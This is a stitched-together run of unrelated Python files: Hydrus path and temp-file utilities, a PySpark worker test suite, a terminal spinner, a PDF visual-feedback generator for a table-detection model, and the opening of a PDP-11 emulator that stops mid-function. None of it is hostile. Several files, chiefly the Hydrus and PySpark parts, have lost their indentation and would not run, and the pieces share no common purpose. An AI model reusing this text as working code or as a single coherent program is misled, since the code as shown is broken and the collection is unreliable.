def CleanUpOldTempPaths():
with TEMP_PATH_LOCK:
data = list( IN_USE_TEMP_PATHS )
for row in data:
( time_failed, temp_path ) = row
if HydrusData.TimeHasPassed( time_failed + 60 ):
try:
os.remove( temp_path )
IN_USE_TEMP_PATHS.discard( row )
except OSError:
if HydrusData.TimeHasPassed( time_failed + 600 ):
IN_USE_TEMP_PATHS.discard( row )
def ConvertAbsPathToPortablePath( abs_path, base_dir_override = None ):
try:
if base_dir_override is None:
base_dir = HG.controller.GetDBDir()
else:
base_dir = base_dir_override
portable_path = os.path.relpath( abs_path, base_dir )
if portable_path.startswith( '..' ):
portable_path = abs_path
except:
portable_path = abs_path
if HC.PLATFORM_WINDOWS:
portable_path = portable_path.replace( '\\', '/' ) # store seps as /, to maintain multiplatform uniformity
return portable_path
def ConvertPortablePathToAbsPath( portable_path, base_dir_override = None ):
portable_path = os.path.normpath( portable_path ) # collapses .. stuff and converts / to \\ for windows only
if os.path.isabs( portable_path ):
abs_path = portable_path
else:
if base_dir_override is None:
base_dir = HG.controller.GetDBDir()
else:
base_dir = base_dir_override
abs_path = os.path.normpath( os.path.join( base_dir, portable_path ) )
if not HC.PLATFORM_WINDOWS and not os.path.exists( abs_path ):
abs_path = abs_path.replace( '\\', '/' )
return abs_path
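# Round-trip sketch (illustrative, not part of Hydrus): with an explicit base dir override,
# the two converters above are inverses for any path that sits under that base.
def ExamplePortableRoundTrip( base_dir ):
    abs_path = os.path.join( base_dir, 'client_files', 'f00.png' )
    portable_path = ConvertAbsPathToPortablePath( abs_path, base_dir_override = base_dir )
    return ConvertPortablePathToAbsPath( portable_path, base_dir_override = base_dir ) == abs_path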
def CopyAndMergeTree( source, dest ):
pauser = HydrusData.BigJobPauser()
MakeSureDirectoryExists( dest )
num_errors = 0
for ( root, dirnames, filenames ) in os.walk( source ):
dest_root = root.replace( source, dest )
for dirname in dirnames:
pauser.Pause()
source_path = os.path.join( root, dirname )
dest_path = os.path.join( dest_root, dirname )
MakeSureDirectoryExists( dest_path )
shutil.copystat( source_path, dest_path )
for filename in filenames:
if num_errors > 5:
raise Exception( 'Too many errors, directory copy abandoned.' )
pauser.Pause()
source_path = os.path.join( root, filename )
dest_path = os.path.join( dest_root, filename )
ok = MirrorFile( source_path, dest_path )
if not ok:
num_errors += 1
def CopyFileLikeToFileLike( f_source, f_dest ):
for block in ReadFileLikeAsBlocks( f_source ): f_dest.write( block )
def DeletePath( path ):
if HG.file_report_mode:
HydrusData.ShowText( 'Deleting {}'.format( path ) )
HydrusData.ShowText( ''.join( traceback.format_stack() ) )
if os.path.exists( path ):
MakeFileWritable( path )
try:
if os.path.isdir( path ):
shutil.rmtree( path )
else:
os.remove( path )
except Exception as e:
if 'Error 32' in str( e ):
# file in use by another process
HydrusData.DebugPrint( 'Trying to delete ' + path + ' failed because it was in use by another process.' )
else:
HydrusData.ShowText( 'Trying to delete ' + path + ' caused the following error:' )
HydrusData.ShowException( e )
def DirectoryIsWritable( path ):
if not os.path.exists( path ):
return False
try:
t = tempfile.TemporaryFile( dir = path )
t.close()
return True
except:
return False
def FilterFreePaths( paths ):
free_paths = []
for path in paths:
HydrusThreading.CheckIfThreadShuttingDown()
if PathIsFree( path ):
free_paths.append( path )
return free_paths
def GetCurrentTempDir():
return tempfile.gettempdir()
def GetDefaultLaunchPath():
if HC.PLATFORM_WINDOWS:
return 'windows is called directly'
elif HC.PLATFORM_MACOS:
return 'open "%path%"'
elif HC.PLATFORM_LINUX:
return 'xdg-open "%path%"'
def GetDevice( path ):
path = path.lower()
try:
partition_infos = psutil.disk_partitions( all = True )
def sort_descending_mountpoint( partition_info ): # i.e. put '/home' before '/'
return - len( partition_info.mountpoint )
partition_infos.sort( key = sort_descending_mountpoint )
for partition_info in partition_infos:
if path.startswith( partition_info.mountpoint.lower() ):
return partition_info.device
except UnicodeDecodeError: # wew lad psutil on some russian lad's fun filesystem
return None
return None
def GetFreeSpace( path ):
disk_usage = psutil.disk_usage( path )
return disk_usage.free
def GetTempDir( dir = None ):
return tempfile.mkdtemp( prefix = 'hydrus', dir = dir )
def SetEnvTempDir( path ):
if os.path.exists( path ) and not os.path.isdir( path ):
raise Exception( 'The given temp directory, "{}", does not seem to be a directory!'.format( path ) )
try:
MakeSureDirectoryExists( path )
except Exception as e:
raise Exception( 'Could not create the temp dir: {}'.format( e ) )
if not DirectoryIsWritable( path ):
raise Exception( 'The given temp directory, "{}", does not seem to be writable-to!'.format( path ) )
for tmp_name in ( 'TMPDIR', 'TEMP', 'TMP' ):
if tmp_name in os.environ:
os.environ[ tmp_name ] = path
tempfile.tempdir = path
def GetTempPath( suffix = '', dir = None ):
return tempfile.mkstemp( suffix = suffix, prefix = 'hydrus', dir = dir )
def HasSpaceForDBTransaction( db_dir, num_bytes ):
if HG.no_db_temp_files:
space_needed = int( num_bytes * 1.1 )
approx_available_memory = psutil.virtual_memory().available * 4 / 5
if approx_available_memory < num_bytes:
return ( False, 'I believe you need about ' + HydrusData.ToHumanBytes( space_needed ) + ' available memory, since you are running in no_db_temp_files mode, but you only seem to have ' + HydrusData.ToHumanBytes( approx_available_memory ) + '.' )
db_disk_free_space = GetFreeSpace( db_dir )
if db_disk_free_space < space_needed:
return ( False, 'I believe you need about ' + HydrusData.ToHumanBytes( space_needed ) + ' on your db\'s partition, but you only seem to have ' + HydrusData.ToHumanBytes( db_disk_free_space ) + '.' )
else:
temp_dir = tempfile.gettempdir()
temp_disk_free_space = GetFreeSpace( temp_dir )
temp_and_db_on_same_device = GetDevice( temp_dir ) == GetDevice( db_dir )
if temp_and_db_on_same_device:
space_needed = int( num_bytes * 2.2 )
if temp_disk_free_space < space_needed:
return ( False, 'I believe you need about ' + HydrusData.ToHumanBytes( space_needed ) + ' on your db\'s partition, which I think also holds your temporary path, but you only seem to have ' + HydrusData.ToHumanBytes( temp_disk_free_space ) + '.' )
else:
space_needed = int( num_bytes * 1.1 )
if temp_disk_free_space < space_needed:
return ( False, 'I believe you need about ' + HydrusData.ToHumanBytes( space_needed ) + ' on your temporary path\'s partition, which I think is ' + temp_dir + ', but you only seem to have ' + HydrusData.ToHumanBytes( temp_disk_free_space ) + '.' )
db_disk_free_space = GetFreeSpace( db_dir )
if db_disk_free_space < space_needed:
return ( False, 'I believe you need about ' + HydrusData.ToHumanBytes( space_needed ) + ' on your db\'s partition, but you only seem to have ' + HydrusData.ToHumanBytes( db_disk_free_space ) + '.' )
return ( True, 'You seem to have enough space!' )
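# Illustrative helper (not part of Hydrus): the multipliers above amount to needing roughly
# 1.1x the transaction size free on the db partition (and on the temp partition when it is
# separate), or 2.2x when the temp dir and the db share a device, since the temporary files
# and the growing db then draw on the same free space.
def ExampleSpaceNeeded( num_bytes, temp_and_db_on_same_device ):
    return int( num_bytes * ( 2.2 if temp_and_db_on_same_device else 1.1 ) )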
def LaunchDirectory( path ):
def do_it():
if HC.PLATFORM_WINDOWS:
os.startfile( path )
else:
if HC.PLATFORM_MACOS:
cmd = [ 'open', path ]
elif HC.PLATFORM_LINUX:
cmd = [ 'xdg-open', path ]
# setsid call un-childs this new process
sbp_kwargs = HydrusData.GetSubprocessKWArgs()
process = subprocess.Popen( cmd, preexec_fn = os.setsid, **sbp_kwargs )
process.communicate()
thread = threading.Thread( target = do_it )
thread.daemon = True
thread.start()
def LaunchFile( path, launch_path = None ):
def do_it( launch_path ):
if HC.PLATFORM_WINDOWS and launch_path is None:
os.startfile( path )
else:
if launch_path is None:
launch_path = GetDefaultLaunchPath()
complete_launch_path = launch_path.replace( '%path%', path )
hide_terminal = False
if HC.PLATFORM_WINDOWS:
cmd = complete_launch_path
preexec_fn = None
else:
cmd = shlex.split( complete_launch_path )
# un-childs this new process
preexec_fn = os.setsid
if HG.subprocess_report_mode:
message = 'Attempting to launch ' + path + ' using command ' + repr( cmd ) + '.'
HydrusData.ShowText( message )
try:
sbp_kwargs = HydrusData.GetSubprocessKWArgs( hide_terminal = hide_terminal, text = True )
process = subprocess.Popen( cmd, preexec_fn = preexec_fn, stdin = subprocess.PIPE, stdout = subprocess.PIPE, stderr = subprocess.PIPE, **sbp_kwargs )
( stdout, stderr ) = process.communicate()
if HG.subprocess_report_mode:
if stdout is None and stderr is None:
HydrusData.ShowText( 'No stdout or stderr came back.' )
if stdout is not None:
HydrusData.ShowText( 'stdout: ' + repr( stdout ) )
if stderr is not None:
HydrusData.ShowText( 'stderr: ' + repr( stderr ) )
except Exception as e:
HydrusData.ShowText( 'Could not launch a file! Command used was:' + os.linesep + str( cmd ) )
HydrusData.ShowException( e )
thread = threading.Thread( target = do_it, args = ( launch_path, ) )
thread.daemon = True
thread.start()
def MakeSureDirectoryExists( path ):
os.makedirs( path, exist_ok = True )
def MakeFileWritable( path ):
if not os.path.exists( path ):
return
try:
stat_result = os.stat( path )
current_bits = stat_result.st_mode
if HC.PLATFORM_WINDOWS:
# this is actually the same value as S_IWUSR, but let's not try to second guess ourselves
desired_bits = stat.S_IREAD | stat.S_IWRITE
else:
# guarantee 644 for regular files m8
desired_bits = stat.S_IRUSR | stat.S_IWUSR | stat.S_IRGRP | stat.S_IROTH
if not ( desired_bits & current_bits ) == desired_bits:
os.chmod( path, current_bits | desired_bits )
except Exception as e:
HydrusData.Print( 'Wanted to add write permission to "{}", but had an error: {}'.format( path, str( e ) ) )
def MergeFile( source, dest ):
if not os.path.isdir( source ):
MakeFileWritable( source )
if PathsHaveSameSizeAndDate( source, dest ):
DeletePath( source )
else:
try:
# this overwrites on conflict without hassle
shutil.move( source, dest )
except Exception as e:
HydrusData.ShowText( 'Trying to move ' + source + ' to ' + dest + ' caused the following problem:' )
HydrusData.ShowException( e )
return False
return True
def MergeTree( source, dest, text_update_hook = None ):
pauser = HydrusData.BigJobPauser()
if not os.path.exists( dest ):
try:
shutil.move( source, dest )
except OSError:
# if there were read only files in source and this was partition to partition, the copy2 goes ok but the subsequent source unlink fails
# so, if it seems this has happened, let's just try a walking mergetree, which should be able to deal with these readonlies on a file-by-file basis
if os.path.exists( dest ):
MergeTree( source, dest, text_update_hook = text_update_hook )
else:
if len( os.listdir( dest ) ) == 0:
for filename in os.listdir( source ):
source_path = os.path.join( source, filename )
dest_path = os.path.join( dest, filename )
if not os.path.isdir( source_path ):
MakeFileWritable( source_path )
shutil.move( source_path, dest_path )
else:
num_errors = 0
for ( root, dirnames, filenames ) in os.walk( source ):
if text_update_hook is not None:
text_update_hook( 'Copying ' + root + '.' )
dest_root = root.replace( source, dest )
for dirname in dirnames:
pauser.Pause()
source_path = os.path.join( root, dirname )
dest_path = os.path.join( dest_root, dirname )
MakeSureDirectoryExists( dest_path )
shutil.copystat( source_path, dest_path )
for filename in filenames:
if num_errors > 5:
raise Exception( 'Too many errors, directory move abandoned.' )
pauser.Pause()
source_path = os.path.join( root, filename )
dest_path = os.path.join( dest_root, filename )
ok = MergeFile( source_path, dest_path )
if not ok:
num_errors += 1
if num_errors == 0:
DeletePath( source )
def MirrorFile( source, dest ):
if not PathsHaveSameSizeAndDate( source, dest ):
try:
MakeFileWritable( dest )
# this overwrites on conflict without hassle
shutil.copy2( source, dest )
except Exception as e:
HydrusData.ShowText( 'Trying to copy ' + source + ' to ' + dest + ' caused the following problem:' )
HydrusData.ShowException( e )
return False
return True
def MirrorTree( source, dest, text_update_hook = None, is_cancelled_hook = None ):
pauser = HydrusData.BigJobPauser()
MakeSureDirectoryExists( dest )
num_errors = 0
for ( root, dirnames, filenames ) in os.walk( source ):
if is_cancelled_hook is not None and is_cancelled_hook():
return
if text_update_hook is not None:
text_update_hook( 'Copying ' + root + '.' )
dest_root = root.replace( source, dest )
surplus_dest_paths = { os.path.join( dest_root, dest_filename ) for dest_filename in os.listdir( dest_root ) }
for dirname in dirnames:
pauser.Pause()
source_path = os.path.join( root, dirname )
dest_path = os.path.join( dest_root, dirname )
surplus_dest_paths.discard( dest_path )
MakeSureDirectoryExists( dest_path )
shutil.copystat( source_path, dest_path )
for filename in filenames:
if num_errors > 5:
raise Exception( 'Too many errors, directory copy abandoned.' )
pauser.Pause()
source_path = os.path.join( root, filename )
dest_path = os.path.join( dest_root, filename )
surplus_dest_paths.discard( dest_path )
ok = MirrorFile( source_path, dest_path )
if not ok:
num_errors += 1
for dest_path in surplus_dest_paths:
pauser.Pause()
DeletePath( dest_path )
def OpenFileLocation( path ):
def do_it():
if HC.PLATFORM_WINDOWS:
cmd = [ 'explorer', '/select,', path ]
elif HC.PLATFORM_MACOS:
cmd = [ 'open', '-R', path ]
elif HC.PLATFORM_LINUX:
raise NotImplementedError( 'Linux cannot open file locations!' )
sbp_kwargs = HydrusData.GetSubprocessKWArgs( hide_terminal = False )
process = subprocess.Popen( cmd, **sbp_kwargs )
process.communicate()
thread = threading.Thread( target = do_it )
thread.daemon = True
thread.start()
def PathsHaveSameSizeAndDate( path1, path2 ):
if os.path.exists( path1 ) and os.path.exists( path2 ):
same_size = os.path.getsize( path1 ) == os.path.getsize( path2 )
same_modified_time = int( os.path.getmtime( path1 ) ) == int( os.path.getmtime( path2 ) )
if same_size and same_modified_time:
return True
return False
def PathIsFree( path ):
try:
stat_result = os.stat( path )
current_bits = stat_result.st_mode
if not current_bits & stat.S_IWRITE:
# read-only file, cannot do the rename check
return True
os.rename( path, path ) # rename a path to itself
return True
except OSError as e: # 'already in use by another process' or an odd filename too long error
HydrusData.Print( 'Already in use/inaccessible: ' + path )
return False
def ReadFileLikeAsBlocks( f ):
next_block = f.read( HC.READ_BLOCK_SIZE )
while len( next_block ) > 0:
yield next_block
next_block = f.read( HC.READ_BLOCK_SIZE )
def RecyclePath( path ):
if HG.file_report_mode:
HydrusData.ShowText( 'Recycling {}'.format( path ) )
HydrusData.ShowText( ''.join( traceback.format_stack() ) )
if os.path.exists( path ):
MakeFileWritable( path )
try:
send2trash.send2trash( path )
except:
HydrusData.Print( 'Trying to recycle ' + path + ' created this error:' )
HydrusData.DebugPrint( traceback.format_exc() )
HydrusData.Print( 'It has been fully deleted instead.' )
DeletePath( path )
def SanitizeFilename( filename ):
if HC.PLATFORM_WINDOWS:
# \, /, :, *, ?, ", <, >, |
filename = re.sub( r'\\|/|:|\*|\?|"|<|>|\|', '_', filename )
else:
filename = re.sub( '/', '_', filename )
return filename
|
test_worker.py
|
# -*- encoding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import tempfile
import threading
import time
import unittest
has_resource_module = True
try:
import resource
except ImportError:
has_resource_module = False
from py4j.protocol import Py4JJavaError
from pyspark.testing.utils import ReusedPySparkTestCase, PySparkTestCase, QuietTest
if sys.version_info[0] >= 3:
xrange = range
class WorkerTests(ReusedPySparkTestCase):
def test_cancel_task(self):
temp = tempfile.NamedTemporaryFile(delete=True)
temp.close()
path = temp.name
def sleep(x):
import os
import time
with open(path, 'w') as f:
f.write("%d %d" % (os.getppid(), os.getpid()))
time.sleep(100)
# start job in background thread
def run():
try:
self.sc.parallelize(range(1), 1).foreach(sleep)
except Exception:
pass
import threading
t = threading.Thread(target=run)
t.daemon = True
t.start()
daemon_pid, worker_pid = 0, 0
while True:
if os.path.exists(path):
with open(path) as f:
data = f.read().split(' ')
daemon_pid, worker_pid = map(int, data)
break
time.sleep(0.1)
# cancel jobs
self.sc.cancelAllJobs()
t.join()
for i in range(50):
try:
os.kill(worker_pid, 0)
time.sleep(0.1)
except OSError:
break # worker was killed
else:
self.fail("worker has not been killed after 5 seconds")
try:
os.kill(daemon_pid, 0)
except OSError:
self.fail("daemon had been killed")
# run a normal job
rdd = self.sc.parallelize(xrange(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_after_exception(self):
def raise_exception(_):
raise Exception()
rdd = self.sc.parallelize(xrange(100), 1)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: rdd.foreach(raise_exception))
self.assertEqual(100, rdd.map(str).count())
def test_after_jvm_exception(self):
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write(b"Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name, 1)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: filtered_data.count())
rdd = self.sc.parallelize(xrange(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_accumulator_when_reuse_worker(self):
from pyspark.accumulators import INT_ACCUMULATOR_PARAM
acc1 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(xrange(100), 20).foreach(lambda x: acc1.add(x))
self.assertEqual(sum(range(100)), acc1.value)
acc2 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(xrange(100), 20).foreach(lambda x: acc2.add(x))
self.assertEqual(sum(range(100)), acc2.value)
self.assertEqual(sum(range(100)), acc1.value)
def test_reuse_worker_after_take(self):
rdd = self.sc.parallelize(xrange(100000), 1)
self.assertEqual(0, rdd.first())
def count():
try:
rdd.count()
except Exception:
pass
t = threading.Thread(target=count)
t.daemon = True
t.start()
t.join(5)
        self.assertTrue(not t.is_alive())
self.assertEqual(100000, rdd.count())
def test_with_different_versions_of_python(self):
rdd = self.sc.parallelize(range(10))
rdd.count()
version = self.sc.pythonVer
self.sc.pythonVer = "2.0"
try:
with QuietTest(self.sc):
self.assertRaises(Py4JJavaError, lambda: rdd.count())
finally:
self.sc.pythonVer = version
def test_python_exception_non_hanging(self):
        # SPARK-21045: exceptions with non-ascii encoding shall not hang PySpark.
try:
def f():
raise Exception("exception with 中 and \xd6\xd0")
self.sc.parallelize([1]).map(lambda x: f()).count()
except Py4JJavaError as e:
if sys.version_info.major < 3:
# we have to use unicode here to avoid UnicodeDecodeError
self.assertRegexpMatches(unicode(e).encode("utf-8"), "exception with 中")
else:
self.assertRegexpMatches(str(e), "exception with 中")
class WorkerReuseTest(PySparkTestCase):
def test_reuse_worker_of_parallelize_xrange(self):
rdd = self.sc.parallelize(xrange(20), 8)
previous_pids = rdd.map(lambda x: os.getpid()).collect()
current_pids = rdd.map(lambda x: os.getpid()).collect()
for pid in current_pids:
self.assertTrue(pid in previous_pids)
@unittest.skipIf(
not has_resource_module,
"Memory limit feature in Python worker is dependent on "
"Python's 'resource' module; however, not found.")
class WorkerMemoryTest(PySparkTestCase):
def test_memory_limit(self):
self.sc._conf.set("spark.executor.pyspark.memory", "1m")
rdd = self.sc.parallelize(xrange(1), 1)
def getrlimit():
import resource
return resource.getrlimit(resource.RLIMIT_AS)
actual = rdd.map(lambda _: getrlimit()).collect()
self.assertTrue(len(actual) == 1)
self.assertTrue(len(actual[0]) == 2)
[(soft_limit, hard_limit)] = actual
self.assertEqual(soft_limit, 1024 * 1024)
self.assertEqual(hard_limit, 1024 * 1024)
if __name__ == "__main__":
import unittest
from pyspark.tests.test_worker import *
try:
import xmlrunner
testRunner = xmlrunner.XMLTestRunner(output='target/test-reports', verbosity=2)
except ImportError:
testRunner = None
unittest.main(testRunner=testRunner, verbosity=2)
|
spinny.py
|
__doc__, __version__ = "A simple spinner library.", "1.1.0"
import itertools, time, threading, sys
class Spinner:
    def __init__(self, dt='Loading...', at='Done.'):
        self.spinner, self.dt, self.at, self.busy = itertools.cycle('⠋⠙⠹⠸⠼⠴⠦⠧⠇⠏'), dt, at, True
    def spin(self):
        while self.busy:
            print(f'{next(self.spinner)} {self.dt}', end='\r', flush=True)
            time.sleep(0.1)
    def __enter__(self):
        self.busy = True
        threading.Thread(target=self.spin).start()
    def __exit__(self, v1, v2, v3):
        self.busy = False
        time.sleep(0.1)
        print(' ' * (len(self.dt) + 2), end='\r')
        if v1 is not None:
            print('❌ Failed: ' + repr(v2))
            sys.exit(1)
        print('\r\033[0;32m✓\033[0m ' + self.at)
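# Minimal usage sketch (assumed, not part of the library): wrap slow work in the context
# manager; the spinner animates on a background thread until the block exits.
if __name__ == '__main__':
    with Spinner('Crunching numbers...', 'All done.'):
        time.sleep(2)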
|
visual_feedback_generator.py
|
from queue import Queue
from threading import Thread
from os import path
import gzip
import pickle
import os
import numpy as np
import cv2
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.backends.backend_pdf
from libs.configuration_manager import ConfigurationManager as gconfig
import time
import sys
class VisualFeedbackGenerator:
def __init__(self, output_path):
self._closed = False
self._initialized = False
self._output_path = output_path
self._queue = None
self._t = None
def _worker(self):
while True:
iteration_number, data = self._queue.get()
self.work(iteration_number, data)
self._queue.task_done()
def start_thread(self):
self._queue = Queue() # When we are out of `cache` number of elements in cache, push it to queue, so it could be written
self._t = Thread(target=self._worker)
        self._t.daemon = True
self._t.start()
self._initialized = True
def add(self, iteration_number, result):
if self._closed or (not self._initialized):
            raise RuntimeError("Attempting to use a closed or an unopened streamer")
self._queue.put((iteration_number, result))
def close(self):
self._queue.join()
self._closed = True
def work(self, iteration_number, data):
image = data['image'] # [max_height, max_width]
gts = data['sampled_ground_truths'] # 3 x [max_entries, num_samples]
preds = data['sampled_predictions'] # 3 x [max_entries, num_samples]
sampled_indices = data['sampled_indices'] # [max_entries, num_samples]
num_vertices = data['global_features'][gconfig.get_config_param("dim_num_vertices", "int")]
height, width = data['global_features'][gconfig.get_config_param("dim_height", "int")],\
data['global_features'][gconfig.get_config_param("dim_width", "int")]
max_height, max_width = gconfig.get_config_param("max_image_height", "float"),\
gconfig.get_config_param("max_image_width", "float")
height_inches = 10*max_height/max_width
vertices = data['vertex_features'] # [max_entries, num_vertex_features]
height, width = int(height), int(width)
num_vertices = int(num_vertices)
image = image.astype(np.uint8)
image = image[:, :, 0]
assert len(gts) == 3 and len(preds) == 3
# image = image[0:height, 0:width]
image = cv2.cvtColor(image, cv2.COLOR_GRAY2BGR)
file_path = lambda type, it: os.path.join(self._output_path, ("%05d_%s.pdf") % (it,type))
output_file_name_cells = file_path('cells', iteration_number)
output_file_name_rows = file_path('rows', iteration_number)
output_file_name_cols = file_path('cols', iteration_number)
output_file_paths = [output_file_name_cells, output_file_name_rows, output_file_name_cols]
x1s = vertices[:, gconfig.get_config_param("dim_vertex_x_position", "int")]
y1s = vertices[:, gconfig.get_config_param("dim_vertex_y_position", "int")]
x2s = vertices[:, gconfig.get_config_param("dim_vertex_x2_position", "int")]
y2s = vertices[:, gconfig.get_config_param("dim_vertex_y2_position", "int")]
test_samples = np.random.randint(0, num_vertices, size=10)
color_1 = (0, 0, 255) # (Blue)
color_2 = (0, 255, 0) # (Green)
color_3 = (255, 0, 0) # (Red)
color_4 = (255, 51, 153) # (Pink)
color_5 = (255, 153, 0) # (Orange)
for type in range(3):
_pred = preds[type]
_gt = gts[type]
samples = sampled_indices[type]
samples_per_vertex = samples.shape[1]
for sample in range(len(test_samples)):
sample_index = test_samples[sample]
image_copy = image.copy()
for i in range(samples_per_vertex):
sample_index_pair = samples[sample_index, i]
if _pred[sample_index, i] == 0 and _gt[sample_index, i] == 0: # Blue
# print("here 1")
cv2.rectangle(image_copy, (x1s[sample_index_pair], y1s[sample_index_pair]), (x2s[sample_index_pair], y2s[sample_index_pair]), color=color_1)
elif _pred[sample_index, i] == 1 and _gt[sample_index, i] == 1: # Green
# print("here 2")
cv2.rectangle(image_copy, (x1s[sample_index_pair], y1s[sample_index_pair]), (x2s[sample_index_pair], y2s[sample_index_pair]), color=color_2)
elif _pred[sample_index, i] == 1 and _gt[sample_index, i] == 0: # Red
# print("here 3")
cv2.rectangle(image_copy, (x1s[sample_index_pair], y1s[sample_index_pair]), (x2s[sample_index_pair], y2s[sample_index_pair]), color=color_3)
elif _pred[sample_index, i] == 0 and _gt[sample_index, i] == 1: # Pink
# print("here 4")
cv2.rectangle(image_copy, (x1s[sample_index_pair], y1s[sample_index_pair]), (x2s[sample_index_pair], y2s[sample_index_pair]), color=color_4)
else:
assert False
cv2.rectangle(image_copy, (x1s[sample_index], y1s[sample_index]), (x2s[sample_index], y2s[sample_index]), color=color_5)
plt.figure(figsize=(10, height_inches), dpi=300)
plt.imshow(image_copy)
pdf = matplotlib.backends.backend_pdf.PdfPages(output_file_paths[type])
for fig in range(1, plt.gcf().number + 1): ## will open an empty extra figure :(
pdf.savefig(fig)
pdf.close()
plt.close('all')
print("PDF written")
|
pdp11.py
|
#!/usr/bin/env python3
# This code is based on Julius Schmidt's PDP-11 emulator for JavaScript.
# You can run that one in your browser: http://pdp11.aiju.de
# (c) 2011, Julius Schmidt, JavaScript/HTML implementation, MIT License
# (c) 2019, Andriy Makukha, ported to Python 3, MIT License
# Version 6 Unix (in the disk image) is available under the four-clause BSD license.
# This implementation has two main threads: GUI and CPU (this file). They exchange `interrupts`
# through Python's PriorityQueue. An additional thread is added for the clock interrupt.
import time, array, threading, queue
from rk05 import RK05
from cons import Terminal, ostr
from interrupt import Interrupt
from disasm import DISASM_TABLE
EXTRACTED_IMAGE_FILENAME = 'extracted.img'
INT = Interrupt # shorthand for Interrupt
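# Illustrative sketch (not used by the emulator): the header comment above describes threads
# exchanging interrupts through a PriorityQueue. Plain tuples with a negated priority show the
# same "highest priority first" behaviour; the real Interrupt class defines its own ordering.
def _priority_queue_sketch():
    q = queue.PriorityQueue()
    for pri, vec in ((4, 0o60), (6, 0o100), (5, 0o70)):
        q.put((-pri, vec))  # negate so the highest priority is popped first
    return [q.get()[1] for _ in range(q.qsize())]  # -> [0o100, 0o70, 0o60]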
class Trap(Exception):
def __init__(self, num, *args):
Exception.__init__(self, *args)
self.num = num
class Page:
def __init__(self, par, pdr):
self.par = par
self.pdr = pdr
self.addr = par & 0o7777
self.len = (pdr >> 8) & 0x7F
self.read = (pdr & 2) == 2
self.write = (pdr & 6) == 6
self.ed = (pdr & 8) == 8
class PDP11:
FLAGN = 8
FLAGZ = 4
FLAGV = 2
FLAGC = 1
BOOTROM = [ ## (PAL-11 assembly)
0o042113, ## "KD"
0o012706, 0o2000, ## MOV #boot_start, SP
0o012700, 0o000000, ## MOV #unit, R0 ; unit number
0o010003, ## MOV R0, R3
0o000303, ## SWAB R3
0o006303, ## ASL R3
0o006303, ## ASL R3
0o006303, ## ASL R3
0o006303, ## ASL R3
0o006303, ## ASL R3
0o012701, 0o177412, ## MOV #RKDA, R1 ; csr
0o010311, ## MOV R3, (R1) ; load da
0o005041, ## CLR -(R1) ; clear ba
0o012741, 0o177000, ## MOV #-256.*2, -(R1) ; load wc
0o012741, 0o000005, ## MOV #READ+GO, -(R1) ; read & go
0o005002, ## CLR R2
0o005003, ## CLR R3
0o012704, 0o2020, ## MOV #START+20, R4
0o005005, ## CLR R5
0o105711, ## TSTB (R1)
0o100376, ## BPL .-2
0o105011, ## CLRB (R1)
0o005007 ## CLR PC
]
RS = ["R0", "R1", "R2", "R3", "R4", "R5", "SP", "PC"]
def __init__(self):
# TODO: why are these not in reset()
self.prdebug = False
self.SR2 = 0
self.interrupts = queue.PriorityQueue()
self.last_interrupt_priority = INT.MAX_PRIORITY
self.running = threading.Event()
# Terminal
self.terminal = Terminal(self)
self.terminal.master.title("PDP-11 emulator @ Python")
self.place_window(self.terminal.master)
# Magnetic disk drive
self.rk = RK05(self)
self.reset()
def place_window(self, master):
try:
master.update_idletasks()
except:
return
sw = master.winfo_screenwidth()
sh = master.winfo_screenheight()
w, h = map(int, master.geometry().split('+')[0].split('x'))
x = max(int((sw-w)/3), 0)
y = max(int((sh-h)/2), 0)
master.geometry('{}x{}+{}+{}'.format(w, h, x, y))
def reset(self):
self.running.clear()
self.clock_running = False # do not enter wait mode until sure that the clock is running
# otherwise - probably in the boot screen, clock interrupt doesn't work (TODO)
self.R = [0, 0, 0, 0, 0, 0, 0, 0] # registers
self.KSP = 0 # kernel mode stack pointer
self.USP = 0 # user mode stack pointer
self.PS = 0 # processor status
self.curPC = 0 # address of current instruction
self.instr = 0 # current instruction
self.memory = array.array('H', bytearray(256*1024*[0])) # 128K of 16-bit unsigned values
self.iter_cnt = 0
self.step_cnt = 0 # unlike iter_cnt doesn't get reset by clock interrupt
self.SR0 = 0
self.curuser = False
self.prevuser = False
self.LKS = 0x80 # Line Frequency Clock
# from reset():
for i in range(len(PDP11.BOOTROM)):
self.memory[0o1000+i] = PDP11.BOOTROM[i]
self.pages = [Page(0, 0) for _ in range(16)]
self.R[7] = 0o2002
self.terminal.request_reset()
self.rk.reinit()
self.running.set()
@staticmethod
def _xor(a, b):
return (a or b) and not (a and b)
def switchmode(self, newmode):
self.prevuser = self.curuser
self.curuser = newmode
if self.prevuser:
self.USP = self.R[6]
else:
self.KSP = self.R[6]
if self.curuser:
self.R[6] = self.USP
else:
self.R[6] = self.KSP
self.PS &= 0o007777
if self.curuser:
self.PS |= (1<<15) | (1<<14)
if self.prevuser:
self.PS |= (1<<13) | (1<<12)
def physread16(self, addr):
if addr & 1:
raise(Trap(INT.BUS, 'read from odd address ' + ostr(addr,6)))
if addr < 0o760000:
return self.memory[addr>>1]
if addr == 0o777546:
return self.LKS
if addr == 0o777570: # what does this do? 0o173030 = 63000
return 0o173030
if addr == 0o777572:
return self.SR0
if addr == 0o777576:
return self.SR2
if addr == 0o777776:
return self.PS
if (addr & 0o777770) == 0o777560:
return self.terminal.consread16(addr)
if (addr & 0o777760) == 0o777400:
return self.rk.read16(addr)
if (addr & 0o777600) == 0o772200 or (addr & 0o777600) == 0o777600:
return self.mmuread16(addr)
if addr == 0o776000:
self.panic('lolwut')
